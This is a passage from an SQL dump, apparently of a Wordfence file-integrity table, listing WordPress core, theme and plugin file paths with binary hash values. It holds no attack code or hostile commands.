���','',0,'?'),('�$����!���+&q�','wp-content/themes/twentytwentyone/assets/sass/05-blocks/code/_editor.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$sR��iNS&&$�d','��l��W�+��� ��5�� ���\rզI9Yk','',0,'?'),('�,X)��E�z�D','wp-content/themes/doctors/core/customizer/help/custom_control_textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b�n������T���\\','Ő��oH�d�%T����fG��=.��}�','',0,'?'),('�1��ϣ�����I�','wp-content/plugins/wordfence/lib/wfImportExportController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����������+>��','�dlы۹`�������J���#|i{�','',0,'?'),('�9�٭���d���%���','wp-content/themes/vision-lite/inc/template-tags.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�F8�1P����}','�7uD@5�#�]A�m|D��}���.C��_�','',0,'?'),('�<��|~E.�Y^�!�]','wp-admin/js/widgets/media-audio-widget.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&t��K!��1��vDb','9���:��%�B�Ɖ\\c֏��WpX� �Q���','',0,'?'),('�?�\n5��H�?����','wp-admin/css/customize-controls.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','������`�ˎz��\Z�','*���}\0P������y��]�yOr�@�|','',0,'?'),('�DV�ɪl�-�XC��`\\','wp-content/plugins/wp-cerber/assets/flags/cu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѝhm!�7���3.�','P�bLO���*]���3�o }���z�xN��','',0,'?'),('�����juGCtO���','wp-admin/css/colors/coffee/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g_ZY�Y����/','oI���P�g��K7�$v��vxlk���t��Ea�S','',0,'?'),('��l�.H|S���{��','wp-includes/js/jquery/ui/effect-transfer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�&��H������*��l�','%��({cI�}��,�Ѧ�)��1`WɆ','',0,'?'),('��\'��*jO459��','wp-content/themes/doctors/core/contents/loop_templateAbout/templateAbout.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُ\0�� ��B~','��B�����șo�$\'�A�d��L���xR�U','',0,'?'),('���ISU`u���T��F','wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�{�bOs�_a��>','m�n5��ߐ֞βgJ�\\�����3�����','',0,'?'),('�ʚ�{�(���\\i�7.','wp-includes/Requests/Exception/HTTP/431.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��s|b$��ѓ<��','�ꅱ��/Y6_���w�pk�w���0���','',0,'?'),('��}�^72������','wp-includes/Requests/Exception/HTTP/415.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��Tb�̮�JU�','v%�_�\0�b$m�&`���(�=�m<�b\Zo0p','',0,'?'),('��l\Z`<�#�� %��>}','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-sortable-control.php',0,'%��7��B{�⋲I�','%��7��B{�⋲I�','�N,�GKA���|��*��Y$��\"\Zg^v��B�N�','',0,'?'),('���3Ȉ��m�Y4���','wp-content/plugins/wordfence/js/wfselect2.min.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J�������!�.���i','l�k}[�ZjA�.!��=+5�+�~q� 1','',0,'?'),('���3�qc;*�V\08�\\','wp-content/themes/twentynineteen/sass/variables-site/_transitions.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ӌؠ����v&��Ad','K��s;���o���ZÏ�Y�S���!e������','',0,'?'),('���an���V=Ty X�','wp-includes/SimplePie/Copyright.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','k��>�����ԪQ','�i��%�ܴ��E�^g���2�z,�@�Q��V','',0,'?'),('��/��-O�ͮ\'�]0','wp-content/themes/advance/inc/kirki/includes/class-kirki-section.php',0,'Ks���7t���M��','Ks���7t���M��','�/�;!2��\\2�h�9D�DvZt:F�Ӻ�%','',0,'?'),('�&�jJ\rɎ˫��','wp-content/themes/doctors/images/demo/blog_3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���C+���n�=��','7HAђ��m�)p�t�s��?�*W�\r<VE5�','',0,'?'),('�N<w()/�E��.�bI','wp-content/plugins/wp-cerber/assets/flags/st.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e��l��Iy���`�f�','�x����˹�5��0��s� ��.:l���','',0,'?'),('�} �yT��Z�H�cDJ','wp-admin/js/custom-background.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'�2� �S�o-E��','����Dʹ�:&�o�n�����L���3�,E','',0,'?'),('��8��TJ\"�M��\\','wp-content/themes/advance/inc/kirki/includes/deprecated.php',0,'`�4���l�t;Q','`�4���l�t;Q','\03c��k���if{��\Z�g��6��kW���','',0,'?'),('����B����w\\Y5','wp-content/themes/wp-barrister/library/images/icon-in.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o�`Á��ʉ����}','o�ou�c\rm�\Z�H�|�|���%�ʊ�ء','',0,'?'),('���S���{|�\"uZz�','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-aside.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<�/�� ��j�t��J�','w;*�Ҙ�\rp�<L$�\r��\r��H\Z���','',0,'?'),('��{�0l(Ʋu9,wS�u','wp-includes/js/media-audiovideo.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ж���t\Z�����','s<~d;lL�n�_u+1��jDO����\\�\0��','',0,'?'),('���@6�ߝ\0AhHc�','wp-content/plugins/wp-cerber/assets/flags/hm.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z�N��n�[���','��|�S�Qw\0��j�G��N��*M����v%','',0,'?'),('��)!)�6��>}�74','wp-includes/css/dist/block-library/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M\"7����g��6>','WM�����r�0���y7:5э�C<�o����','',0,'?'),('���L��V�Y��*','wp-includes/js/plupload/moxie.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|A��09��K�:���','��[\n��Y�@sZ�F�Ul�+�Έ�f���Ǩ\0','',0,'?'),('� �A$ۤfC�N��37','wp-includes/query.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O���o�y&���u','Z�@�?@��ή��=���*^(21����y����','',0,'?'),('�(���ה�W�h@=a','wp-includes/images/smilies/icon_mad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�!�@�c�0�S�','�������d[O:LJ�����jl}�q�','',0,'?'),('�7�0���,� M','wp-includes/sodium_compat/namespaced/Core/Poly1305.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qy���?�;�8�V\n�','\0�-��]뮳��XEt)�`��1�C�}Mr2�/','',0,'?'),('�g\Z��\\�\r�`=�m�','wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P\r�L����{ǀ�','����VZ+��&�\r�Щ�U;�L)R�!ӵ�','',0,'?'),('�i���B�j����]','wp-includes/sodium_compat/namespaced/Crypto.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�G8�J+�� ��z','>8���\'X�i�Ub�Gн�,<T`6��4Ѝ�','',0,'?'),('���*���~N��܄','wp-content/themes/skt-toothy/images/icon-clock.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':�YvF�d`��t�','���.��>\"��ٮ�Q�r#���\0lIV��^��','',0,'?'),('����v���ό�Y9�','wp-includes/ID3/getid3.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CPb$M6̟��ҁ�','\"\Z^�,8>K����@��湅����l��|AF��','',0,'?'),('���ћl�@�v^a�','wp-content/themes/skt-toothy/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ov��t���RhNa\nӹ�','a�TYౙq�X���ȣ`*��>��_{�� R','',0,'?'),('��%#ߊ��D�+v�','wp-content/themes/wp-barrister/library/images/icon-vi.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2;<)3p�T�\"� B','lH��6��<�<��̒o\rB����Rs�+�','',0,'?'),('���X����H�o�v�','wp-admin/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���i�q㤭�{���$I','ŁnGĂ�M\"k�7�w\"ҥ�!�I[�1','',0,'?'),('��!N��D�w�`��[�','wp-includes/js/jquery/ui/dialog.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�屬�U��u���z̜','H7�pn�\Z��8����__E<��\r��','',0,'?'),('��U�]>�rք�{��v','wp-content/plugins/wp-cerber/assets/flags/cf.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C��oG��`?���','�\0�m�٢K��K��ǡNЙT��� ��','',0,'?'),('���Xp����~0D','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HSalsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W�oe�~��oB2�_;','5�q��SrL�]�OX����sq����+l<��ɒ','',0,'?'),('��֗]NR���S{qv?�','wp-admin/css/wp-admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',*i����[p]��<','r5S�E�?29/�)��_�PJv�Vh���R�','',0,'?'),('��\Z,z���Ґ�U�','wp-includes/rest-api/endpoints/class-wp-rest-terms-controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y[�&A*zϦ/��?<�','�������Dn��N����AU)n�J�','',0,'?'),('���%���}�ұ���','wp-content/themes/doctors/core/home/blocks/slideshow/skin1/html.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��117����e6C{�','踣�ad$\n��fg�Mn�K+PE1X','',0,'?'),('��O$8��J�e��','wp-content/plugins/wordfence/models/scanner/wfScanner.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H p3+$������','�I�E���|��Ap��ך�X�9n@��','',0,'?'),('��*v�<�TC�U�XJn','wp-includes/blocks/column/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b\'��������E�4�','z�,�g3�l[�9�v[�=\rW�\'3e�c�INڷ�','',0,'?'),('�\0��߯NI���','wp-content/themes/twentynineteen/inc/back-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=�D�F/�u+:��@�','�=7���a(P�w�Ɯ&���|�������','',0,'?'),('�����n�E��','wp-content/plugins/all-in-one-wp-security-and-firewall/css/wp-security-site-lockout-page.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��nOΨ�J���z�<','ԥ6Wi��� F4�hd��4��ˡV8�\0ݟ�','',0,'?'),('�V�܂0\0U�`�5C>','wp-includes/css/dist/components/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�t�<���l�j�!','QR0�2�>�S��\\���}�a�sz9�<','',0,'?'),('�� �6��!\"�P ','wp-content/themes/twentytwentyone/package.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����M���<HC�:@�','�H�E���\rA��l8k#�h�@w�}�}','',0,'?'),('�\Z� �R����[�\'�>','wp-content/plugins/wordfence/css/images/ui-icons_777620_256x240.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�\\c7�y�x�гl','�~��qV����*\'�1�����]3�^�����m','',0,'?'),('� 拖�xl�\Z>W��L','wp-content/themes/regina-lite/layout/js/plugins/customizer/customizer.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m�s�M#inrm�5','n�ٮ����?����~���P�,���� �\'ī�','',0,'?'),('�$�����j�X�])D:','wp-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f+ʅ�D`\0��`d->}','|�:m\"�S,�h�k���\Z8V��0d�eCe�','',0,'?'),('�2�\\�17Հ�wi�{','wp-includes/js/dist/vendor/wp-polyfill.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P����$@A.0�Qt','@b�/E�ؔå��;M �ۙZRİ�x����','',0,'?'),('�7KF�veŤ��','wp-content/themes/vision-lite/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ִW|Z�ҵ3��M�C\\','�x�1�<�Z5bk��Z��h>��]_%bh�R��','',0,'?'),('�H�)������jH�j','wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V�\'B�l�If���\"c','��O$��U?��\nR��y���V�=�T���Z','',0,'?'),('�j%M�ɍ��p)Z��','wp-admin/images/generic.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\'�[#98!�','�{u���K[g͆Ex�{�:��lͨG��','',0,'?'),('������9�0w6���','wp-content/themes/regina-lite/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�7��4�\nֱu�9.','�1s9&iNx�]��1�O?lm�R�f�j@�','',0,'?'),('���v�*~����ߏ','wp-content/themes/twentytwentyone/assets/images/playing-in-the-sand.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��8I/CM��x��','��W}u�}��v��m��7=E�K�Y4','',0,'?'),('��RKQ�5v�-�� ��','wp-includes/css/dist/edit-post/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�-��b�E��y�L�J��','9 �`��\'@GGXLH��K����Ħ�ᚆ','',0,'?'),('��;(Xp`ҙ��pݷ','wp-includes/js/plupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T_\'!;��QYЦIk&Q','�I��Zh�y8s��Cv����rTVRḾ','',0,'?'),('��t�0�g�a�/��','wp-includes/js/tinymce/skins/lightgray/fonts/tinymce-small.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~��-����x\'� ','��{ڋ��N�o��#X�+Xe\'�����_����>\Z','',0,'?'),('�\n�qo�qZVyX��9','wp-admin/includes/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#&��9��hE�p��6�','Ǫ�s��E\'���\\l��D)i�$�����q','',0,'?'),('�.,ُ m�Vѧ�_�','wp-content/themes/regina-lite/inc/components/breadcrumb/class-regina-breadcrumbs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��28h����ٟD�_�','�S���H@q2�3�������A�[����_�','',0,'?'),('�!�+��U�U��\n&','wp-content/themes/twentytwenty/classes/class-twentytwenty-walker-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','v���I\"��cz>�','�мU�h\n5?�Iq9�L��SC0�eGDe��','',0,'?'),('�(��v�GEͷ����','wp-content/themes/doctors/sidebar.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����)fɦ����<�_','Z�z\'t���\'�wP�ƙmx�$�>ڤ��#\rE;','',0,'?'),('�)q�\"��ff�\nlߩ|','wp-content/plugins/wp-cerber/admin/cerber-admin-settings.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0Ow�\n��<[�Q','���呂 p�oG��r�X?���,���','',0,'?'),('�0ٷ�,���ZxW�\0�','wp-content/themes/regina-lite/page-templates/template-homepage.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2>݉_$�vSv�','��]Hi\\�⣿1L\\�Q\"C�_=�н����y�','',0,'?'),('�`�@�����YE�!','wp-includes/Requests/Transport/cURL.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��87a`CZ��','hI���� x<�������%��ji�����$','',0,'?'),('��.��E$&��WWx\\','wp-content/themes/healthcare/bootstrap/css/bootstrap-theme.css.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~��!L�1n�:�9','�F�2!�D�5�:���=k��-U\Z^b��','',0,'?'),('���c;�9���_','wp-content/themes/skt-toothy/front-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','e�� ~\0+��x��Ķ','�~�ն-�+`��n�1�P�ҥ�Ӻb�4�V','',0,'?'),('���KK�ܕ,@A��','wp-content/themes/advance/inc/kirki/assets/js/controls/date.js',0,'�t�����4EȋL','�t�����4EȋL','uఓ2*)��5���;8������[�·&�6�L','',0,'?'),('��%�����0�C\'<?�','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-generic-control.php',0,'����*���-�','����*���-�','���r橛��#YW�E� �B\Zh����ʤ��','',0,'?'),('��Ư \'CԻ��ګ\Z','wp-includes/images/admin-bar-sprite.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���:�W���^','��rN!�`VO�c��K��viՀ{Fn\Z��le','',0,'?'),('��4��#հ�}��','wp-content/plugins/wordfence/modules/login-security/views/manage/code.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/�j-�W�.�{��@','�i%X�Y`FmZ���E^ab}r�_E�����3�','',0,'?'),('��\"�Z0\0ؿe�Ԧp�','wp-admin/css/admin-menu.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T:�#}�9�H��76��','���i��O*�i������/ŝ�v�y��a��','',0,'?'),('���a�Dw�B�N','wp-content/themes/doctors/core/customizer/help/custom_control_image.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3?�(p�Qt�7���','�>���ԓ_��(�x|�3C�^O�+:eGb0Z��','',0,'?'),('����\"8Y��74�O<','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Util.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','di�BD�J���D�5�O','N�a���i�B���\r��AO]���@�P��','',0,'?'),('����x8[!>�X','wp-admin/includes/class-wp-users-list-table.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�N\n�V�\r�@���&�','���)%����n�Aڛ.}����x\"�}���n','',0,'?'),('��������>��%�','wp-content/themes/wp-barrister/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�*2���.��2� �','�ob��B��Sr����WǙ�T� ��=�','',0,'?'),('��՟b��c��QI�','wp-content/themes/healthcare/js/customizer-range-value-control.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���4 \\0�|���\'r','�~#�����ѡk�/�LQm�2Z��wn�����','',0,'?'),('����o*nFߘ7��','wp-content/plugins/wp-cerber/assets/flags/mv.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'���FꠈT�[�~��','�dE4{��P�-��B������:�Þ$�{FF�','',0,'?'),('��ue�{X�1���','wp-includes/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��D�5��$ý\n �\'q0','\\��\"�ԯ-\r6��e�N�ID�zB�\r\0��','',0,'?'),('�(���a���b��(�','wp-content/plugins/wordfence/css/wf-global.1623076348.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ADmqc��v��d9','�(O��ӛˀԟMAW��D�0�\\��5LG�','',0,'?'),('�/��0)���\Z�','wp-content/plugins/wordfence/views/scanner/issue-database.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�� \n�Ro�N7�|','~��❃gd�&w[�u������o��|t��}','',0,'?'),('�1�cUd���/R� ','wp-content/plugins/wp-cerber/assets/flags/nu.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�C�����=7Ѝ�','���z��f���7?v�F�`)c�۱���s`$+','',0,'?'),('�@�q��G�-$����|�','wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����gPʋ��i��[','�DeJ�\Z�fxb� x\'P�:�����U','',0,'?'),('�F�&�>��!xr� TG','wp-content/themes/weblog/searchform.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z�<Fw���a�t�b@','�H\r��(���Ѣӟ���B\r[�/!�K�','',0,'?'),('�J�:��`A�q����1','wp-content/themes/twentynineteen/images/pattern_04.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��*����$[��;��R','#��(4�2L{���]����{˖e~1\'��0','',0,'?'),('�Mܙ��}K���g�\0��','wp-content/themes/wp-barrister/single-people.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UW]*�Ny6bzE? nj','ԙ�S�Z�I.��}��\n�0��Zf��iuά�X','',0,'?'),('�S���KK2iɈ','wp-includes/comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A���]�ř3F8rȃ','\'B�6E�:��bw=�#u�\0��> &���M�','',0,'?'),('�f�g-�6A�[�X�~�','wp-content/plugins/redirection/locale/json/redirection-sv_SE.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Is��0��ܰ�','9X!��*��q�:��(*��?F���}�O@s���','',0,'?'),('�xG�\'_/wJgJ�D�','wp-content/themes/doctors/core/contents/loop_single/skin1/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kp��,.���H��jG','� ����()8וt�JWj�/{�؇,����','',0,'?'),('�x�_,[��5����','wp-content/plugins/wordfence/images/sort_asc_disabled.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ǐ#a]2������','����[8l�Y���ckl�� ��u#KV���n','',0,'?'),('�y�g��zaU\"� XKG','wp-includes/js/hoverIntent.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��z/P���ꮱ< �','t��neTR/�77�@\Zҧ0�g�nj����','',0,'?'),('����&P8��F�{�\0','wp-content/plugins/disable-gutenberg/inc/classic-editor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{\'��w���_��j�','Y��Ҽ(�IsՕ��7�{��t�I�,�w(���','',0,'?'),('����-���!ЬD\'V�','wp-content/themes/weblog/acmethemes/customizer/design-options/custom-css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�\n?uo���Q','�lݫ�z`�Ü�� ��x�h�*J��H.��K�U','',0,'?'),('��l��ۧ6�/y<','wp-content/themes/advance/inc/kirki/includes/controls/class-kirki-controls-multicheck-control.php',0,'��:4FaZ�V�L�}','��:4FaZ�V�L�}','���T�Wt�^Z\Z U]\Z\Z%� ��[gxF','',0,'?'),('���X��k�\nX�l<{M�','wp-content/plugins/redirection/redirection-front.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��_0�[͟���|��4','���o��5I�o#J���QD��q��t3.���1','',0,'?'),('���H\"�Dۺ\\H��[','wp-content/themes/doctors/core/customizer/help/custom_control_select.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9=��Q,��v�!','}y�\0f�˳ю�s�����,:q`�O\"��Y�2','',0,'?'),('�����gFB�ZÚ(v','wp-content/themes/twentytwenty/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Xŏ������i�','���&T6bbeV%��]�R���v�Q$�/�','',0,'?'),('���E��b�ꝼ��i�','wp-content/themes/vision-lite/header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Zm�z�0�h��O','�8����-��^�.�\\���Q�a����X�','',0,'?'),('���NTZt�o\r�%��F','wp-content/plugins/wordfence/views/scanner/options-group-general.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tL�Ga�\0�oҠbY','2�6��l�n\r��\"� c�:�ƅz�v�J1ܶ��','',0,'?'),('�롨�zˡ�z���G?','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/js/epsilon-previewer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%-g��]����','�)1���7\Z�O3zdh�U���(��=`�ۥ8m','',0,'?'),('����������wT','wp-includes/blocks/button/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��]��u���H(','A$\Z�\Z�d��1�����/�ހ[�7�G','',0,'?'),('��\"Rދ�?�c\r:��','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/customizer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yO/��Ȩ��)/Gg','s��,����{JJR3��Z�Lи�HKO�fe9�','',0,'?'),('�o�/�d�4x`��','wp-content/plugins/akismet/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' B\0,��\\�>��T��P','&���D��*n�.�[��(O����4���P��','',0,'?'),('�+Fc�0m_����Ii','wp-content/themes/twentytwentyone/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-�\nq3Ԙ>�}6Y�','Ĭ{z�K��E[�j8��؈��Oݩ��r���5d�','',0,'?'),('�-�d.z4DW��:','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/vendors/epsilon-framework/customizer/components/controls/color-picker/color-picker.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0�A�|��eP���kF','ZBi;ȏ)�ތ��K������<J��6\Z�','',0,'?'),('�/�ɘ�]�^�W\\�q','wp-includes/css/wp-embed-template.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')I+�w2�h���K\"�','�6&�}�ok��AM\Z> �|�F�6,e�t\rPq','',0,'?'),('�v{L�Jlō�Yz�`�(','wp-includes/js/thickbox/thickbox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��P�R�n�,(�f�','M�ߍ��V�_�^����ol\'\0��qYL�̘)���','',0,'?'),('�}�ʼ�[���Ff7v','wp-content/themes/regina-lite/inc/libraries/epsilon-framework/assets/css/scss/controls/color-schemes.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g���`����#E�c�I','�����Y�:��oK^�*��H��Q^�}���','',0,'?'),('����WyZJ��ݘT);','wp-content/themes/doctors/core/assets/css/swipebox.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� �:�kf~+���',';/{�_�+��{�c�����Z���BV�-G��','',0,'?'),('��k��V��G�d�/��','wp-content/plugins/wp-cerber/assets/flags/th.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��w�Vtc��3�G�G�','��o�#�ߗ|!\\A�L=Uހ��L��q�Y�p','',0,'?'),('��(��NL�; ��','wp-includes/js/dist/api-fetch.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B��p=(mV�2��_a','G�y���л\r��7�5���d������R��','',0,'?'),('��TI�&��*��U��','wp-content/themes/weblog/acmethemes/customizer/design-options/design-panel.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WW�[\n�\r�nґ�r','�\ZQ��?l%��-�̥<�>f!Zs%rJ*��}','',0,'?'),('��]M��cv��.M','wp-content/themes/skt-toothy/page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Pv���|d��Wy����','(�Q�~$���t)(�\\��<>�7_��`��','',0,'?'),('��?UB�w��N i�','wp-content/themes/twentynineteen/sass/navigation/_menu-footer-navigation.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f��p��4g����','�����x8o1������b��pr���p���','',0,'?'),('����� \0���@���5','wp-content/themes/skt-toothy/js/customize-preview.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oW�v�g\n8�Fӕ\"','{ܭ/����&���\Z��=�l�d;q����>w','',0,'?'),('���퇴���u��4�6','wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l�fk��<��\r\n��','R!�O]p�I\n��\\��VP�9�=��!�?���','',0,'?'),('���8�zx�KIvXn�','wp-content/themes/skt-toothy/customize-pro/example-1/section-pro.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��e���..%�fX','y�0��M��8��w��0��̖�ɚ��z�p�Y�','',0,'?'),('�����A���V�f��','wp-content/plugins/wp-cerber/assets/flags/ug.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����h�UNJ}�','��;�T�W��m�� ����(Izҁ��h2','',0,'?'),('����JQ&�}j��','wp-content/themes/doctors/core/contents/part_footer/skin2/css.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�l2�37�P���','q��u���5L0��3S|=#a�s�j���vQ','',0,'?'),('�X�VטO|8}���','wp-includes/theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W]��(DR{��.','Xe[ �4\0����\",����d��ځ��#�','',0,'?'),('�.�XvQa�*C��eN','wp-content/plugins/wp-cerber/assets/flags/ph.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','06zD\'�w��� 